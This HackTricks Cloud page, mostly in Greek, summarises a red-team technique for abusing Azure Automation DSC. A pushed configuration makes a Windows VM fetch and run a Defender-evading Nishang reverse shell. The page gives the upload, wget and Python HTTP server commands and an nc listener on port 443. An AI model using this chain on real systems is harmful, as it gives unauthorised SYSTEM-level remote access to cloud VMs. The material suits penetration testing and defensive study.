Az - State Configuration RCE

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Check the complete post in: https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe

Summary of Remote Server (C2) Infrastructure Preparation and Steps

Overview

Η διαδικασία περιλαμβάνει την εγκατάσταση μιας υποδομής απομακρυσμένου διακομιστή για τη φιλοξενία ενός τροποποιημένου payload Invoke-PowerShellTcp.ps1 του Nishang, ονόματι RevPS.ps1, σχεδιασμένο να παρακάμπτει το Windows Defender. Το payload εξυπηρετείται από μια μηχανή Kali Linux με IP 40.84.7.74 χρησιμοποιώντας έναν απλό HTTP server Python. Η λειτουργία εκτελείται μέσω αρκετών βημάτων:

Step 1 — Create Files

Files Required: Απαιτούνται δύο σενάρια PowerShell:

reverse_shell_config.ps1: Ένα αρχείο Desired State Configuration (DSC) που ανακτά και εκτελεί το payload. Είναι διαθέσιμο από το GitHub.
push_reverse_shell_config.ps1: Ένα σενάριο για τη δημοσίευση της διαμόρφωσης στη VM, διαθέσιμο στο GitHub.

Customization: Οι μεταβλητές και οι παράμετροι σε αυτά τα αρχεία πρέπει να προσαρμοστούν στο συγκεκριμένο περιβάλλον του χρήστη, συμπεριλαμβανομένων των ονομάτων πόρων, των διαδρομών αρχείων και των αναγνωριστικών διακομιστή/payload.

Step 2 — Zip Configuration File

Το reverse_shell_config.ps1 συμπιέζεται σε ένα αρχείο .zip, καθιστώντας το έτοιμο για μεταφορά στον Azure Storage Account.

Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip

Step 3 — Set Storage Context & Upload

Το συμπιεσμένο αρχείο ρύθμισης μεταφορτώνεται σε ένα προκαθορισμένο δοχείο Azure Storage, azure-pentest, χρησιμοποιώντας την εντολή Set-AzStorageBlobContent του Azure.

Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx

Βήμα 4 — Προετοιμασία του Kali Box

Ο διακομιστής Kali κατεβάζει το φορτίο RevPS.ps1 από ένα αποθετήριο GitHub.

wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1

Το σενάριο επεξεργάζεται για να καθορίσει το στοχευμένο Windows VM και την πόρτα για το reverse shell.

Βήμα 5 — Δημοσίευση Αρχείου Διαμόρφωσης

Το αρχείο διαμόρφωσης εκτελείται, με αποτέλεσμα το σενάριο reverse-shell να αναπτυχθεί στην καθορισμένη τοποθεσία στο Windows VM.

Βήμα 6 — Φιλοξενία Payload και Ρύθμιση Listener

Ένας Python SimpleHTTPServer ξεκινά για να φιλοξενήσει το payload, μαζί με έναν listener Netcat για να καταγράψει τις εισερχόμενες συνδέσεις.

sudo python -m SimpleHTTPServer 80
sudo nc -nlvp 443

Η προγραμματισμένη εργασία εκτελεί το payload, επιτυγχάνοντας δικαιώματα επιπέδου SYSTEM.

Συμπέρασμα

Η επιτυχής εκτέλεση αυτής της διαδικασίας ανοίγει πολλές δυνατότητες για περαιτέρω ενέργειες, όπως η εξαγωγή διαπιστευτηρίων ή η επέκταση της επίθεσης σε πολλές VMs. Ο οδηγός ενθαρρύνει τη συνεχιζόμενη μάθηση και τη δημιουργικότητα στον τομέα του Azure Automation DSC.

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAz - Automation Account NextAz - Azure App Service & Function Apps

Last updated 3 days ago